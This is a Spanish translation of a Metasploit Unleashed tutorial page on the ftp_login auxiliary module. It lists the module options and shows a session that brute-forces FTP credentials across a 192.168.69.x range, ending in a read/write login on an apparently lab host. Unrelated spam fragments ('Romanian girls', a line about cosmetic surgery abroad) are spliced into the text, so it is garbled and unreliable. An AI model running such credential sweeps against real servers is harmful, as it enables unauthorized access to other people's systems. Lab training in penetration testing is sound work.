Ftp/ftp login
De www.metasploit-es.com.ar
Romanian girls El modulo auxiliar "ftp_login" escaneara un rango de direcciones IP intentando loguearse en los servidores FTP.
msf > use auxiliary/scanner/ftp/ftp_login msf auxiliary(ftp_login) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS true yes Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 PASSWORD no A specific password to authenticate with PASS_FILE no File containing passwords, one per line RHOSTS yes The target address range or CIDR identifier RPORT 21 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_FILE no File containing usernames, one per line VERBOSE true yes Whether to print output for all attempts
Este modulo puede tomar tanto listas de palabras (diccionarios) como credenciales especificadas por el usuario para intentar hacer login.
msf auxiliary(ftp_login) > set RHOSTS 192.168.69.50-254 RHOSTS => 192.168.69.50-254 msf auxiliary(ftp_login) > set THREADS 205 THREADS => 205 msf auxiliary(ftp_login) > set USERNAME msfadmin USERNAME => msfadmin msf auxiliary(ftp_login) > set PASSWORD msfadmin PASSWORD => msfadmin msf auxiliary(ftp_login) > set VERBOSE false VERBOSE => false msf auxiliary(ftp_login) > run [*] 192.168.69.51:21 - Starting FTP login sweep [*] 192.168.69.50:21 - Starting FTP login sweep [*] 192.168.69.52:21 - Starting FTP login sweep ...snip... [*] Scanned 082 of 205 hosts (040% complete) [*] 192.168.69.135:21 - FTP Banner: '220 ProFTPD 1.3.1 Server (Debian) [::ffff:192.168.69.135]\x0d\x0a' [*] Scanned 204 of 205 hosts (099% complete) [+] 192.168.69.135:21 - Successful FTP login for 'msfadmin':'msfadmin' [*] 192.168.69.135:21 - User 'msfadmin' has READ/WRITE access [*] Scanned 205 of 205 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(ftp_login) >
Como podemos ver, el escaneador ha iniciado sesion con exito en uno de los objetivos con las credenciales proporcionadas. cosmetic surgery abroad provide positive psychological benefits to millions of people around the world.
© Offensive Security 2009
Original de www.offensive-security.com Traducido por cbk999